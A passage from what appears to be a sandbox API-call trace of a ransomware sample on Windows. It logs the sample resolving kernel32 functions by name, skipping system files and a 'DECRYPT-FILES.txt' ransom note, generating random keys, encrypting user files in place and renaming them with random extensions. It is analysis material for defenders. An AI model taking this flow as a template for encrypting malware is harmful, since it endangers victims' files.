[0185.548] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.548] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.548] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.548] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.548] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.548] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.548] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.548] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.548] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.548] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.548] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.548] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.548] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.548] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.548] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.548] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.548] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.549] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.549] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.gutyCG") returned 87 [0185.549] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.gutyCG.o0iMWy") returned 94 [0185.549] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.gutyCG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.gutycg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.gutyCG.o0iMWy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.gutycg.o0imwy"), dwFlags=0x0) returned 1 [0185.551] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.552] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.552] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.552] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaee955a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url.5yCxy1", cAlternateFileName="MICROS~1.5YC")) returned 1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="DECRYPT-FILES.txt") returned 1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="autorun.inf") returned 1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="boot.ini") returned 1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="desktop.ini") returned 1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="ntuser.dat") returned -1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="iconcache.db") returned 1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="bootsect.bak") returned 1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="ntuser.dat.log") returned -1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="thumbs.db") returned -1 [0185.552] lstrcmpiW (lpString1="Microsoft Store.url.5yCxy1", lpString2="Bootfont.bin") returned 1 [0185.552] lstrlenW (lpString="Microsoft Store.url.5yCxy1") returned 26 [0185.552] lstrcmpiW (lpString1="5yCxy1", lpString2="lnk") returned -1 [0185.552] lstrcmpiW (lpString1="5yCxy1", lpString2="exe") returned -1 [0185.552] lstrcmpiW (lpString1="5yCxy1", lpString2="sys") returned -1 [0185.552] lstrcmpiW (lpString1="5yCxy1", lpString2="dll") returned -1 [0185.552] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0185.552] lstrlenW (lpString="Microsoft Store.url.5yCxy1") returned 26 [0185.552] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0185.552] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Microsoft Store.url.5yCxy1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.5yCxy1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.5yCxy1" [0185.552] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.5yCxy1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.5ycxy1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.553] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=398) returned 1 [0185.553] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.553] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.553] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.553] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.553] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.554] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.554] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.554] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.555] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.555] CloseHandle (hObject=0x268) returned 1 [0185.555] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.555] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.556] CloseHandle (hObject=0x0) returned 0 [0185.556] CloseHandle (hObject=0x264) returned 1 [0185.556] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.556] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.557] GetTickCount () returned 0x1135a12 [0185.557] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.557] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.557] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.557] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.557] lstrlenA (lpString="kernel32.dll") returned 12 [0185.557] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.557] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.557] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.558] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.558] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.558] lstrlenA (lpString="ADDATOMA") returned 8 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.558] lstrlenA (lpString="ADDATOMW") returned 8 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.558] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.558] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.558] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.558] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.558] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.558] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.558] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.558] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.558] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.558] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.558] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.558] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.558] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.558] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.558] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.559] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.559] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.559] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.559] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.559] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.559] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.559] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.559] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.559] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.559] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.559] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.559] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.559] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.559] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.559] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.559] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.559] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.559] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.559] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.559] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.560] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.560] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.560] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.560] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.560] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.560] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.560] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.560] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.560] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.560] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.560] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.560] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.560] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.560] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.560] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.560] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.560] lstrlenA (lpString="BEEP") returned 4 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.560] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.560] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.561] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.561] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.561] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.561] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.561] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.561] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.561] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.561] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.561] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.561] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.561] lstrlenA (lpString="CANCELIO") returned 8 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.561] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.561] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.561] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.561] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.561] lstrlenA 